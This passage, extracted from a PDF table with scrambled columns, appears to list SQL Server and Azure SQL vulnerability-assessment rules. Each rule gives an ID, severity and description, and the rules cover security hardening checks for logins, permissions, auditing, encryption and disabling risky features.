mapped to a specific database user. 
This rule checks that no database 
roles are assigned to the Guest user. 


Cross database ownership chaining is 
an extension of ownership chaining, 
except it does cross the database 
boundary. This rule checks that this 
option is disabled for all databases 
except for master, msdb, and tempdb . 
For master, msdb, and tempdb, cross 
database ownership chaining is 
enabled by default. 


The guest user permits access to a 
database for any logins that are not 
mapped to a specific database user. 
This rule checks that the guest user 
cannot connect to any database. 


CHECK_POLICY option enables 
verifying SQL logins against the 
domain policy. This rule checks that 
CHECK_POLICY option is enabled for 
all SQL logins. 


Platform 


SQL 
Server 
2012+! 


SQL 
Server 
2012+ 


SQL 
Database 


SQL 
Server 
2012+ 


SQL 
Managed 
Instance 


SQL 
Server 
2012+ 


SQL 
Managed 
Instance 


SQL 
Server 
2012+ 


SQL 
Managed 
Instance 


Rule ID 


VA1047 


VA1048 


VA1052 


VA1053 


VA1054 


Rule Title 


Password expiration 
check should be 
enabled for all SQL 
logins 


Database principals 
should not be mapped 
to the sa account 


Remove 
BUILTIN\Administrators 
as a server login 


Account with default 
name sa should be 
renamed or disabled 


Excessive permissions 
should not be granted 
to PUBLIC role on 
objects or columns 


Rule 
Severity 


Low 


High 


Low 


Low 


Low 


Rule Description 


Password expiration policies are used 
to manage the lifespan of a password. 
When SQL Server enforces password 
expiration policy, users are reminded 
to change old passwords, and 
accounts that have expired passwords 
are disabled. This rule checks that 
password expiration policy is enabled 
for all SQL logins. 


A database principal that is mapped 
to the sa account can be exploited by 
an attacker to elevate permissions to 


sysadmin 


The BUILTIN\Administrators group 
contains the Windows Local 
Administrators group. In older 
versions of Microsoft SQL Server this 
group has administrator rights by 
default. This rule checks that this 
group is removed from SQL Server. 


sa is a well-known account with 
principal ID 1. This rule verifies that 
the sa account is either renamed or 
disabled. 


Every SQL Server login belongs to the 
public server role. When a server 
principal has not been granted or 
denied specific permissions on a 
securable object the user inherits the 
permissions granted to public on that 
object. This rule displays a list of all 
securable objects or columns that are 
accessible to all users through the 
PUBLIC role. 


Platform 


SQL 
Server 
2012+ 


SQL 
Managed 
Instance 


SQL 
Server 
2012+ 


SQL 
Managed 
Instance 


SQL 
Server 
2012+ 


SQL 
Server 
2012+ 


SQL 
Managed 
Instance 


SQL 
Server 
2012+ 


SQL 
Database 


Rule ID 


VA1058 


VA1059 


VA1067 


VA1068 


VA1070 


Rule Title Rule 

Severity 
sa login should be High 
disabled 


xp_cmdshell should be High 
disabled 


Database Mail XPs Medium 
should be disabled 
when it is not in use 


Server permissions Low 
shouldn't be granted 
directly to principals 


Database users Low 
shouldn't share the 

same name as a server 

login 


Rule Description 


sa is a well-known account with 
principal ID 1. This rule verifies that 
the sa account is disabled. 


xp_cmdshell spawns a Windows 
command shell and passes it a string 
for execution. This rule checks that 
xp_cmdshell is disabled. 


This rule checks that Database Mail is 
disabled when no database mail 
profile is configured. Database Mail 
can be used for sending e-mail 
messages from the SQL Server 
Database Engine and is disabled by 
default. If you are not using this 
feature, it is recommended to disable 
it to reduce the surface area. 


Server level permissions are 
associated with a server level object 
to regulate which users can gain 
access to the object. This rule checks 
that there are no server level 


permissions granted directly to logins. 


Database users may share the same 
name as a server login. This rule 
validates that there are no such users. 


Platform 


SQL 
Server 
2012+ 


SQL 
Managed 
Instance 


SQL 
Server 
2012+ 


SQL 
Managed 
Instance 


SQL 
Server 
2012+ 


SQL 
Server 
2012+ 


SQL 
Managed 
Instance 


SQL 
Server 
2012+ 


SQL 
Managed 
Instance 


Rule ID 


VA1072 


VA1094 


VA1095 


VA1096 


Rule Title Rule 
Severity 
Authentication mode Medium 


should be Windows 
Authentication 


Database permissions Low 
shouldn't be granted 
directly to principals 


Excessive permissions Medium 
should not be granted 
to PUBLIC role 


Principal GUEST should Low 
not be granted 

permissions in the 

database 


Rule Description 


There are two possible authentication 
modes: Windows Authentication 
mode and mixed mode. Mixed mode 
means that SQL Server enables both 
Windows authentication and SQL 
Server authentication. This rule checks 
that the authentication mode is set to 
Windows Authentication. 


Permissions are rules associated with 
a securable object to regulate which 
users can gain access to the object. 
This rule checks that there are no DB 
permissions granted directly to users. 


Every SQL Server login belongs to the 
public server role. When a server 
principal has not been granted or 
denied specific permissions on a 
securable object the user inherits the 
permissions granted to public on that 
object. This displays a list of all 
permissions that are granted to the 
PUBLIC role. 


Each database includes a user called 
GUEST. Permissions granted to GUEST 
are inherited by users who have 
access to the database but who do 
not have a user account in the 
database. This rule checks that all 
permissions have been revoked from 
the GUEST user. 


Platform 


SQL 
Server 
2012+ 


SQL 
Server 
2012+ 


SQL 
Managed 
Instance 


SQL 
Server 
2012+ 


SQL 
Managed 
Instance 


SQL 
Database 


SQL 
Server 
2012+ 


SQL 
Managed 
Instance 


SQL 
Database 


Rule ID Rule Title 


VA1097 Principal GUEST should 
not be granted 
permissions on objects 
or columns 


VA1099 GUEST user should not 
be granted permissions 
on database securables 


VA1246 Application roles 
should not be used 


Rule 
Severity 


Low 


Low 


Low 


Rule Description 


Each database includes a user called 
GUEST. Permissions granted to GUEST 
are inherited by users who have 
access to the database but who do 
not have a user account in the 
database. This rule checks that all 
permissions have been revoked from 
the GUEST user. 


Each database includes a user called 
GUEST. Permissions granted to GUEST 
are inherited by users who have 
access to the database but who do 
not have a user account in the 
database. This rule checks that all 
permissions have been revoked from 
the GUEST user. 


An application role is a database 
principal that enables an application 
to run with its own user-like 
permissions. Application roles enable 
that only users connecting through a 
particular application can access 
specific data. Application roles are 
password-based (which applications 
typically hardcode) and not 
permission based which exposes the 
database to app role impersonation 
by password-guessing. This rule 
checks that no application roles are 
defined in the database. 


Platform 


SQL 
Server 
2012+ 


SQL 
Managed 
Instance 


SQL 
Database 


SQL 
Server 
2012+ 


SQL 
Managed 
Instance 


SQL 
Database 


SQL 
Server 
2012+ 


SQL 
Managed 
Instance 


SQL 
Database 


Rule ID Rule Title Rule 
Severity 


VA1248 User-defined database Medium 
roles should not be 
members of fixed roles 


VA1267 Contained users should Medium 
use Windows 
Authentication 


VA1280 Server Permissions Medium 
granted to public 
should be minimized 


VA1282 Orphan roles should be Low 
removed 


Rule Description 


To easily manage the permissions in 
your databases SQL Server provides 
several roles, which are security 
principals that group other principals. 
They are like groups in the Microsoft 
Windows operating system. Database 
accounts and other SQL Server roles 
can be added into database-level 
roles. Each member of a fixed- 
database role can add other users to 
that same role. This rule checks that 
no user-defined roles are members of 
fixed roles. 


Contained users are users that exist 
within the database and do not 
require a login mapping. This rule 
checks that contained users use 
Windows Authentication. 


Every SQL Server login belongs to the 
public server role. When a server 
principal has not been granted or 
denied specific permissions ona 
securable object the user inherits the 
permissions granted to public on that 
object. This rule checks that server 
permissions granted to public are 
minimized. 


Orphan roles are user-defined roles 
that have no members. Eliminate 
orphaned roles as they are not 
needed on the system. This rule 
checks whether there are any orphan 
roles. 


Platform 


SQL 
Server 
2012+ 


SQL 
Managed 
Instance 


SQL 
Database 


Azure 
Synapse 


SQL 
Server 
2012+ 


SQL 
Managed 
Instance 


SQL 
Server 
2012+ 


SQL 
Managed 
Instance 


SQL 
Server 
2012+ 


SQL 
Managed 
Instance 


SQL 
Database 


Azure 
Synapse 


Rule ID Rule Title Rule 
Severity 
VA2020 Minimal set of High 


VA2033 


VA2103 


principals should be 
granted ALTER or 
ALTER ANY USER 
database-scoped 
permissions 


Minimal set of Low 
principals should be 

granted database- 

scoped EXECUTE 

permission on objects 

or columns 


Unnecessary execute Medium 
permissions on 

extended stored 

procedures should be 

revoked 


Rule Description 


Every SQL Server securable has 
permissions associated with it that 
can be granted to principals. 
Permissions can be scoped at the 
server level (assigned to logins and 
server roles) or at the database level 
(assigned to database users and 
database roles). These rules check 
that only a minimal set of principals 
are granted ALTER or ALTER ANY 
USER database-scoped permissions. 


This rule checks which principals are 
granted EXECUTE permission on 
objects or columns to ensure this 
permission is granted to a minimal set 
of principals. Every SQL Server 
securable has permissions associated 
with it that can be granted to 
principals. Permissions can be scoped 
at the server level (assigned to logins 
and server roles) or at the database 
level (assigned to database users, 
database roles, or application roles). 
The EXECUTE permission applies to 
both stored procedures and scalar 
functions, which can be used in 
computed columns. 


Extended stored procedures are DLLs 
that an instance of SQL Server can 
dynamically load and run. SQL Server 
is packaged with many extended 
stored procedures that allow for 
interaction with the system DLLs. This 
rule checks that unnecessary execute 
permissions on extended stored 
procedures have been revoked. 


Platform 


SQL 
Server 
2012+ 


SQL 
Managed 
Instance 


SQL 
Database 


Azure 
Synapse 


SQL 
Server 
2012+ 


SQL 
Managed 
Instance 


SQL 
Database 


Azure 
Synapse 


SQL 
Server 
2012+ 


SQL 
Managed 
Instance 


Rule ID Rule Title 


VA2107 


VA2108 


VA2109 


Minimal set of 
principals should be 
members of fixed 
Azure SQL DB master 
database roles 


Minimal set of 
principals should be 
members of fixed high 
impact database roles 


Minimal set of 
principals should be 
members of fixed low 
impact database roles 


Rule 
Severity 


High 


High 


Low 


Rule Description 


SQL Database provides two restricted 
administrative roles in the master 
database to which user accounts can 
be added that grant permissions to 
either create databases or manage 
logins. This rule check that a minimal 
set of principals are members of these 
administrative roles. 


SQL Server provides roles to help 
manage the permissions. Roles are 
security principals that group other 
principals. Database-level roles are 
database-wide in their permission 
scope. This rule checks that a minimal 
set of principals are members of the 
fixed database roles. 


SQL Server provides roles to help 
manage the permissions. Roles are 
security principals that group other 
principals. Database-level roles are 
database-wide in their permission 
scope. This rule checks that a minimal 
set of principals are members of the 
fixed database roles. 


Platform 


SQL 
Database 


Azure 
Synapse 


SQL 
Server 
2012+ 


SQL 
Managed 
Instance 


SQL 
Database 


Azure 
Synapse 


SQL 
Server 
2012+ 


SQL 
Managed 
Instance 


SQL 
Database 


Azure 
Synapse 


Rule ID 


VA2110 


VA2113 


VA2114 


VA2129 


Rule Title 


Execute permissions to 
access the registry 
should be revoked 


Data Transformation 
Services (DTS) 
permissions should 
only be granted to SSIS 
roles 


Minimal set of 
principals should be 
members of high 
impact fixed server 
roles 


Changes to signed 
modules should be 
authorized 


Rule 


Severity 


High 


Medium 


High 


High 


Rule Description 


Registry extended stored procedures 
allow Microsoft SQL Server to read 
write and enumerate values and keys 
in the registry. They are used by 
Enterprise Manager to configure the 
server. This rule checks that the 
permissions to execute registry 
extended stored procedures have 
been revoked from all users (other 
than dbo). 


Data Transformation Services (DTS), is 
a set of objects and utilities that allow 
the automation of extract, transform, 
and load operations to or from a 
database. The objects are DTS 
packages and their components, and 
the utilities are called DTS tools. This 
rule checks that only the SSIS roles 
are granted permissions to use the 
DTS system stored procedures and 
the permissions for the PUBLIC role to 
use the DTS system stored procedures 
have been revoked. 


SQL Server provides roles to help 
manage permissions. Roles are 
security principals that group other 
principals. Server-level roles are 
server-wide in their permission scope. 
This rule checks that a minimal set of 
principals are members of the fixed 
server roles. 


You can sign a stored procedure, 
function, or trigger with a certificate 
or an asymmetric key. This is 
designed for scenarios when 
permissions cannot be inherited 
through ownership chaining or when 
the ownership chain is broken, such 
as dynamic SQL. This rule checks for 
changes made to signed modules, 
which could be an indication of 
malicious use. 


Platform 


SQL 
Server 
2012+ 


SQL 
Managed 
Instance 


SQL 
Server 
2012+ 


SQL 
Managed 
Instance 


SQL 
Server 
2012+ 


SQL 
Managed 
Instance 


SQL 
Server 
2012+ 


SQL 
Database 


SQL 
Managed 
Instance 


Rule ID Rule Title Rule Rule Description Platform 


Severity 
VA2130 Track all users with Low This check tracks all users with access SQL 
access to the database to a database. Make sure that these Database 
users are authorized according to 
their current role in the organization. Azure 
Synapse 
VA2201 SQL logins with High This rule checks the accounts with SQL 
commonly used names database owner permission for Server 
should be disabled commonly used names. Assigning 2012+ 
commonly used names to accounts 
with database owner permission 
increases the likelihood of successful 
brute force attacks. 
Auditing and Logging 
Rule ID Rule Title Rule Rule Description Platform 
Severity 
VA1045 Default trace Medium Default trace provides troubleshooting SQL 
should be assistance to database administrators by Server 
enabled ensuring that they have the log data 2012+ 
necessary to diagnose problems the first 
time they occur. This rule checks that the SQL 
default trace is enabled. Managed 
Instance 
VA1091 Auditing of both Low SQL Server Login auditing configuration SQL 
successful and enables administrators to track the users Server 
failed login logging into SQL Server instances. If the user 2012+ 
attempts chooses to count on ‘Login auditing’ to track 
(default trace) users logging into SQL Server instances, 
should be then it is important to enable it for both 
enabled when successful and failed login attempts. 
‘Login auditing’ 
is set up to track 
logins 
VA1093 Maximum Low Each SQL Server Error log will have all the SQL 
number of error information related to failures / errors that Server 
logs should be have occurred since SQL Server was last 2012+ 
12 or more restarted or since the last time you have 


recycled the error logs. This rule checks that 
the maximum number of error logs is 12 or 
more. 


Rule ID 


VA1258 


VA1264 


VA1265 


VA1281 


Rule Title 


Database 
owners are as 
expected 


Auditing of both 
successful and 
failed login 
attempts should 
be enabled 


Auditing of both 
successful and 
failed login 
attempts for 
contained DB 
authentication 
should be 
enabled 


All memberships 
for user-defined 
roles should be 
intended 


Rule 
Severity 


High 


Low 


Medium 


Medium 


Rule Description 


Database owners can perform all 
configuration and maintenance activities on 
the database and can also drop databases in 
SQL Server. Tracking database owners is 
important to avoid having excessive 
permission for some principals. Create a 
baseline that defines the expected database 
owners for the database. This rule checks 
whether the database owners are as defined 
in the baseline. 


SQL Server auditing configuration enables 
administrators to track the users logging 
into SQL Server instances that they're 
responsible for. This rule checks that 
auditing is enabled for both successful and 
failed login attempts. 


SQL Server auditing configuration enables 
administrators to track users logging to SQL 
Server instances that they're responsible for. 
This rule checks that auditing is enabled for 
both successful and failed login attempts for 
contained DB authentication. 


User-defined roles are security principals 
defined by the user to group principals to 
easily manage permissions. Monitoring 
these roles is important to avoid having 
excessive permissions. Create a baseline that 
defines expected membership for each user- 
defined role. This rule checks whether all 
memberships for user-defined roles are as 
defined in the baseline. 


Platform 


SQL 
Server 
2016+3 


SQL 
Database 


Azure 
Synapse 


SQL 
Server 
2012+ 


SQL 
Managed 
Instance 


SQL 
Server 
2012+ 


SQL 
Managed 
Instance 


SQL 
Server 
2012+ 


SQL 
Managed 
Instance 


SQL 
Database 


Azure 
Synapse 


Rule ID 


VA1283 


VA2061 


Rule Title Rule 
Severity 


There should be Low 
at least 1 active 

audit in the 

system 


Auditing should High 
be enabled at 
the server level 


Data Protection 


Rule ID 


VA1098 


Rule Title Rule 
Severity 


Any Existing High 
SSB or 

Mirroring 

endpoint 

should require 

AES connection 


Rule Description 


Auditing an instance of the SQL Server 
Database Engine or an individual database 
involves tracking and logging events that 
occur on the Database Engine. The SQL 
Server Audit object collects a single instance 
of server or database-level actions and 
groups of actions to monitor. This rule 
checks that there is at least one active audit 
in the system. 


Azure SQL Database Auditing tracks 
database events and writes them to an audit 
log in your Azure storage account. Auditing 
helps you understand database activity and 
gain insight into discrepancies and 
anomalies that could indicate business 
concerns or suspected security violations as 
well as helps you meet regulatory 
compliance. For more information, see Azure 
SQL Auditing. This rule checks that auditing 
is enabled. 


Rule Description 


Service Broker and Mirroring endpoints 
support different encryption algorithms 
including no-encryption. This rule checks that 
any existing endpoint requires AES 
encryption. 


Platform 


SQL 
Server 
2012+ 


SQL 
Managed 
Instance 


SQL 
Database 


Azure 
Synapse 


Platform 


SQL 
Server 
2012+ 


Rule ID 


VA1219 


VA1220 


VA1221 


VA1222 


Rule Title Rule 


Severity 


Transparent 
data 
encryption 
should be 
enabled 


Database High 
communication 

using TDS 

should be 

protected 


through TLS 


Database High 
Encryption 

Symmetric 

Keys should 

use AES 


algorithm 


Cell-Level High 
Encryption 

keys should 

use AES 


algorithm 


Medium 


Rule Description 


Transparent data encryption (TDE) helps to 
protect the database files against information 
disclosure by performing real-time encryption 
and decryption of the database, associated 
backups, and transaction log files ‘at rest’, 
without requiring changes to the application. 
This rule checks that TDE is enabled on the 
database. 


Microsoft SQL Server can use Secure Sockets 
Layer (SSL) or Transport Layer Security (TLS) to 
encrypt data that is transmitted across a 
network between an instance of SQL Server 
and a client application. This rule checks that 
all connections to the SQL Server are 
encrypted through TLS. 


SQL Server uses encryption keys to help 
secure data credentials and connection 
information that is stored in a server 
database. SQL Server has two kinds of keys: 
symmetric and asymmetric. This rule checks 
that Database Encryption Symmetric Keys use 
AES algorithm. 


Cell-Level Encryption (CLE) allows you to 
encrypt your data using symmetric and 
asymmetric keys. This rule checks that Cell- 
Level Encryption symmetric keys use AES 
algorithm. 


Platform 


SQL 
Server 
2012+ 


SQL 
Managed 
Instance 


SQL 
Database 


Azure 
Synapse 


SQL 
Server 
2012+ 


SQL 
Managed 
Instance 


SQL 
Server 
2012+ 


SQL 
Managed 
Instance 


SQL 
Database 


Azure 
Synapse 


SQL 
Server 
2012+ 


SQL 
Managed 
Instance 


Rule ID 


VA1223 


VA1224 


VA1279 


VA2060 


Rule Title 


Certificate keys 
should use at 
least 2048 bits 


Asymmetric 
keys' length 
should be at 
least 2048 bits 


Force 
encryption 
should be 
enabled for 
TDS 


SQL Threat 
Detection 
should be 
enabled at the 
server level 


Rule 


Severity 


High 


High 


High 


Medium 


Rule Description 


Certificate keys are used in RSA and other 
encryption algorithms to protect data. These 
keys need to be of enough length to secure 
the user's data. This rule checks that the key's 
length is at least 2048 bits for all certificates. 


Database asymmetric keys are used in many 
encryption algorithms these keys need to be 
of enough length to secure the encrypted 
data this rule checks that all asymmetric keys 
stored in the database are of length of at 
least 2048 bits 


When the Force Encryption option for the 
Database Engine is enabled all 
communications between client and server is 
encrypted regardless of whether the ‘Encrypt 
connection’ option (such as from SSMS) is 
checked or not. This rule checks that Force 
Encryption option is enabled. 


SQL Threat Detection provides a layer of 
security that detects potential vulnerabilities 
and anomalous activity in databases such as 
SQL injection attacks and unusual behavior 
patterns. When a potential threat is detected 
Threat Detection sends an actionable real- 
time alert by email and in Microsoft Defender 
for Cloud, which includes clear investigation 
and remediation steps for the specific threat. 
For more information, please see Configure 
threat detection. This check verifies that SQL 
Threat Detection is enabled 


Platform 


SQL 
Server 
2012+ 


SQL 
Managed 
Instance 


SQL 
Database 


Azure 
Synapse 


SQL 
Server 
2012 


SQL 
Server 
2014 


SQL 
Database 


SQL 
Server 
2012+ 


SQL 
Managed 
Instance 


SQL 
Database 


Azure 
Synapse 


Installation Updates and Patches 


Rule ID Rule Title 


VA1018 


VA2128 


Latest 
updates 
should be 
installed 


Vulnerability 
assessment is 
not 
supported for 
SQL Server 
versions lower 
than SQL 
Server 2012 


Rule 
Severity 


High 


High 


Rule Description 


Microsoft periodically releases Cumulative 
Updates (CUs) for each version of SQL Server. 
This rule checks whether the latest CU has 
been installed for the particular version of SQL 
Server being used, by passing in a string for 
execution. This rule checks that all users 
(except dbo) do not have permission to 
execute the xp_cmdshell extended stored 
procedure. 


To run a vulnerability assessment scan on your 
SQL Server the server needs to be upgraded to 
SQL Server 2012 or higher, SQL Server 2008 R2 
and below are no longer supported by 
Microsoft. For more information, see 


Platform 


SQL 
Server 
2005 


SQL 
Server 
2008 


SQL 
Server 
2008 


SQL 
Server 
2012 


SQL 
Server 
2014 


SQL 
Server 
2016 


SQL 
Server 
2017 


SQL 
Server 
2012+ 


SQL 
Managed 
Instance 


SQL 
Database 


Azure 
Synapse 


Surface Area Reduction 


Rule ID Rule Title 


VA1022 


VA1023 


VA1026 


VA1027 


VA1044 


Ad hoc 
distributed 
queries 
should be 
disabled 


CLR should 
be disabled 


CLR should 
be disabled 


Untracked 
trusted 
assemblies 
should be 
removed 


Remote 
Admin 


Connections 


should be 
disabled 
unless 
specifically 
required 


Rule 
Severity 


Medium 


High 


Medium 


High 


Medium 


Rule Description 


Ad hoc distributed queries use the OPENROWSET 
and OPENDATASOURCE functions to connect to 
remote data sources that use OLE DB. This rule 
checks that ad hoc distributed queries are 
disabled. 


The CLR allows managed code to be hosted by 
and run in the Microsoft SQL Server 
environment. This rule checks that CLR is 
disabled. 


The CLR allows managed code to be hosted by 
and run in the Microsoft SQL Server 
environment. CLR strict security treats SAFE and 
EXTERNAL_ACCESS assemblies as if they were 
marked UNSAFE and requires all assemblies be 
signed by a certificate or asymmetric key with a 
corresponding login that has been granted 
UNSAFE ASSEMBLY permission in the master 
database. This rule checks that CLR is disabled. 


Assemblies marked as UNSAFE are required to 
be signed by a certificate or asymmetric key 
with a corresponding login that has been 
granted UNSAFE ASSEMBLY permission in the 
master database. Trusted assemblies may 
bypass this requirement. 


This rule checks that remote dedicated admin 
connections are disabled if they are not being 
used for clustering to reduce attack surface 
area. SQL Server provides a dedicated 
administrator connection (DAC). The DAC lets 
an administrator access a running server to 
execute diagnostic functions or Transact-SQL 
statements, or to troubleshoot problems on the 
server and it becomes an attractive target to 
attack when it is enabled remotely. 


Platform 


SQL 
Server 
2012+ 


SQL 
Server 
2012+ 


SQL 
Server 
2017+? 


SQL 
Managed 
Instance 


SQL 
Server 
2017+ 


SQL 
Managed 
Instance 


SQL 
Server 
2012+ 


SQL 
Managed 
Instance 


Rule ID 


VA1051 


VA1066 


VA1071 


VA1092 


VA1102 


Rule Title 


AUTO_CLOSE 
should be 
disabled on 


all databases 


Unused 
service 
broker 
endpoints 
should be 
removed 


‘Scan for 
startup 
stored 
procedures’ 
option 
should be 
disabled 


SQL Server 
instance 
shouldn't be 
advertised by 
the SQL 
Server 
Browser 
service 


The 
Trustworthy 
bit should be 
disabled on 
all databases 
except MSDB 


Rule 
Severity 


Medium 


Low 


Medium 


Low 


High 


Rule Description 


The AUTO_CLOSE option specifies whether the 
database shuts down gracefully and frees 
resources after the last user disconnects. 
Regardless of its benefits it can cause denial of 
service by aggressively opening and closing the 
database, thus it is important to keep this 
feature disabled. This rule checks that this 
option is disabled on the current database. 


Service Broker provides queuing and reliable 
messaging for SQL Server. Service Broker is 
used both for applications that use a single SQL 
Server instance and applications that distribute 
work across multiple instances. Service Broker 
endpoints provide options for transport security 
and message forwarding. This rule enumerates 
all the service broker endpoints. Remove those 
that are not used. 


When ‘Scan for startup procs’ is enabled SQL 
Server scans for and runs all automatically run 
stored procedures defined on the server. If this 
option is enabled SQL Server scans for and runs 
all automatically run stored procedures defined 
on the server. This rule checks that this option is 
disabled. 


SQL Server uses the SQL Server Browser service 
to enumerate instances of the Database Engine 
installed on the computer. This enables client 
applications to browse for a server and helps 
clients distinguish between multiple instances 
of the Database Engine on the same computer. 
This rule checks that the SQL instance is hidden. 


The TRUSTWORTHY database property is used 
to indicate whether the instance of SQL Server 
trusts the database and the contents within it. If 
this option is enabled database modules (for 
example user-defined functions or stored 
procedures) that use an impersonation context 
can access resources outside the database. This 
rule verifies that the TRUSTWORTHY bit is 
disabled on all databases except MSDB. 


Platform 


SQL 
Server 
2012+ 


SQL 
Server 
2012+ 


SQL 
Server 
2012+ 


SQL 
Server 
2012+ 


SQL 
Server 
2012+ 


SQL 
Managed 
Instance 


Rule ID 


VA1143 


VA1144 


VA1230 


VA1235 


Rule Title 


‘dbo’ user 
should not 
be used for 
normal 
service 
operation 


Model 
database 
should only 
be accessible 
by ‘dbo’ 


Filestream 
should be 
disabled 


Server 
configuration 
‘Replication 
XPs' should 
be disabled 


Rule 
Severity 


Medium 


Medium 


High 


Medium 


Rule Description 


The 'dbo' or database owner is a user account 
that has implied permissions to perform all 
activities in the database. Members of the 
sysadmin fixed server role are automatically 
mapped to dbo. This rule checks that dbo is not 
the only account allowed to access this 
database. Note that on a newly created clean 
database this rule will fail until additional roles 
are created. 


The Model database is used as the template for 
all databases created on the instance of SQL 
Server. Modifications made to the model 
database such as database size recovery model 
and other database options are applied to any 
databases created afterward. This rule checks 
that dbo is the only account allowed to access 
the model database. 


FILESTREAM integrates the SQL Server Database 
Engine with an NTFS file system by storing 
varbinary (max) binary large object (BLOB) data 
as files on the file system. Transact-SQL 
statements can insert, update, query, search, 
and back up FILESTREAM data. Enabling 
Filestream on SQL server exposes additional 
NTFS streaming API, which increases its attack 
surface and makes it prone to malicious attacks. 
This rule checks that Filestream is disabled. 


Disable the deprecated server configuration 
‘Replication XPs' to limit the attack surface area. 
This is an internal only configuration setting. 


Platform 


SQL 
Server 
2012+ 


SQL 
Managed 
Instance 


SQL 
Database 


Azure 
Synapse 


SQL 
Server 
2012+ 


SQL 
Managed 
Instance 


SQL 
Server 
2012+ 


SQL 
Server 
2012+ 


SQL 
Managed 
Instance 


Rule ID Rule Title 


VA1244 


VA1245 


VA1247 


VA1256 


VA1277 


VA1278 


Orphaned 
users should 
be removed 
from SQL 
server 
databases 


The dbo 
information 
should be 
consistent 
between the 
target DB 
and master 


There should 
be no SPs 
marked as 
auto-start 


User CLR 
assemblies 
should not 
be defined in 
the database 


Polybase 
network 
encryption 
should be 
enabled 


Create a 
baseline of 
External Key 
Management 
Providers 


Rule 
Severity 


Medium 


High 


High 


High 


High 


Medium 


Rule Description 


A database user that exists on a database but 
has no corresponding login in the master 
database or as an external resource (for 
example, a Windows user) is referred to as an 
orphaned user and it should either be removed 
or remapped to a valid login. This rule checks 
that there are no orphaned users. 


There is redundant information about the dbo 
identity for any database: metadata stored in 
the database itself and metadata stored in 
master DB. This rule checks that this information 
is consistent between the target DB and master. 


When SQL Server has been configured to ‘scan 
for startup procs’ the server will scan master DB 
for stored procedures marked as auto-start. This 
rule checks that there are no SPs marked as 
auto-start. 


CLR assemblies can be used to execute arbitrary 
code on SQL Server process. This rule checks 
that there are no user-defined CLR assemblies 
in the database. 


PolyBase is a technology that accesses and 
combines both non-relational and relational 
data all from within SQL Server. Polybase 
network encryption option configures SQL 
Server to encrypt control and data channels 
when using Polybase. This rule verifies that this 
option is enabled. 


The SQL Server Extensible Key Management 
(EKM) enables third-party EKM / Hardware 
Security Modules (HSM) vendors to register 
their modules in SQL Server. When registered 
SQL Server users can use the encryption keys 
stored on EKM modules,this rule displays a list 
of EKM providers being used in the system. 


Platform 


SQL 
Server 
2012+ 


SQL 
Managed 
Instance 


SQL 
Server 
2012+ 


SQL 
Managed 
Instance 


SQL 
Server 
2012+ 


SQL 
Server 
2012+ 


SQL 
Managed 
Instance 


SQL 
Server 
2016+ 


SQL 
Server 
2012+ 


SQL 
Managed 
Instance 


Rule ID Rule Title 


VA2062 


VA2063 


Database- 
level firewall 
rules should 
not grant 
excessive 
access 


Server-level 
firewall rules 
should not 
grant 
excessive 
access 


Rule 
Severity 


High 


High 


Rule Description 


The Azure SQL Database-level firewall helps 
protect your data by preventing all access to 
your database until you specify which IP 
addresses have permission. Database-level 
firewall rules grant access to the specific 
database based on the originating IP address of 
each request. Database-level firewall rules for 
master and user databases can only be created 
and managed through Transact-SQL (unlike 
server-level firewall rules, which can also be 
created and managed using the Azure portal or 
PowerShell). For more information, see Azure 
SQL Database and Azure Synapse Analytics IP 
firewall rules. This check verifies that database- 
level firewall rules do not grant access to more 
than 255 IP addresses. 


The Azure SQL server-level firewall helps protect 
your server by preventing all access to your 
databases until you specify which IP addresses 
have permission. Server-level firewall rules grant 
access to all databases that belong to the server 
based on the originating IP address of each 
request. Server-level firewall rules can only be 
created and managed through Transact-SQL as 
well as through the Azure portal or PowerShell. 
For more information, see Azure SQL Database 
and Azure Synapse Analytics IP firewall rules. 
This check verifies that server-level firewall rules 
do not grant access to more than 255 IP 
addresses. 


Platform 


SQL 
Database 


Azure 
Synapse 


SQL 
Database 


Azure 
Synapse 


Rule ID 


VA2064 


VA2065 


VA2111 


Rule Title 


Database- 
level firewall 
rules should 
be tracked 
and 
maintained 
at a strict 
minimum 


Server-level 
firewall rules 
should be 
tracked and 
maintained 
at a strict 
minimum 


Sample 
databases 
should be 
removed 


Rule 
Severity 


High 


High 


Low 


Rule Description 


The Azure SQL Database-level firewall helps 
protect your data by preventing all access to 
your database until you specify which IP 
addresses have permission. Database-level 
firewall rules grant access to the specific 
database based on the originating IP address of 
each request. Database-level firewall rules for 
master and user databases can only be created 
and managed through Transact-SQL (unlike 
server-level firewall rules, which can also be 
created and managed using the Azure portal or 
PowerShell). For more information, see Azure 
SQL Database and Azure Synapse Analytics IP 
firewall rules. This check enumerates all the 
database-level firewall rules so that any changes 
made to them can be identified and addressed. 


The Azure SQL server-level firewall helps protect 
your data by preventing all access to your 
databases until you specify which IP addresses 
have permission. Server-level firewall rules grant 
access to all databases that belong to the server 
based on the originating IP address of each 
request. Server-level firewall rules can be 
created and managed through Transact-SQL as 
well as through the Azure portal or PowerShell. 
For more information, see Azure SQL Database 
and Azure Synapse Analytics IP firewall rules. 
This check enumerates all the server-level 
firewall rules so that any changes made to them 
can be identified and addressed. 


Microsoft SQL Server comes shipped with 
several sample databases. This rule checks 
whether the sample databases have been 
removed. 


Platform 


SQL 
Database 


Azure 
Synapse 


SQL 
Database 


Azure 
Synapse 


SQL 
Server 
2012+ 


SQL 
Managed 
Instance 


Rule ID 


VA2120 


VA2121 


VA2122 


Rule Title 


Features that 
may affect 
security 
should be 
disabled 


‘OLE 
Automation 
Procedures’ 
feature 
should be 
disabled 


‘User 
Options' 
feature 
should be 
disabled 


Rule 


Severity 


High 


High 


Medium 


Rule Description 


SQL Server is capable of providing a wide range 
of features and services. Some of the features 
and services provided by default may not be 
necessary and enabling them could adversely 
affect the security of the system. This rule 
checks that these features are disabled. 


SQL Server is capable of providing a wide range 
of features and services. Some of the features 
and services, provided by default, may not be 
necessary, and enabling them could adversely 
affect the security of the system. The OLE 
Automation Procedures option controls 
whether OLE Automation objects can be 
instantiated within Transact-SQL batches. These 
are extended stored procedures that allow SQL 
Server users to execute functions external to 
SQL Server. Regardless of its benefits it can also 
be used for exploits, and is known as a popular 
mechanism to plant files on the target 
machines. It is advised to use PowerShell as a 
replacement for this tool. This rule checks that 
‘OLE Automation Procedures’ feature is 
disabled. 


SQL Server is capable of providing a wide range 
of features and services. Some of the features 
and services provided by default may not be 
necessary and enabling them could adversely 
affect the security of the system. The user 
options specifies global defaults for all users. A 
list of default query processing options is 
established for the duration of a user's work 
session. The user options allows you to change 
the default values of the SET options (if the 
server's default settings are not appropriate). 
This rule checks that ‘user options' feature is 
disabled. 


Platform 


SQL 
Server 
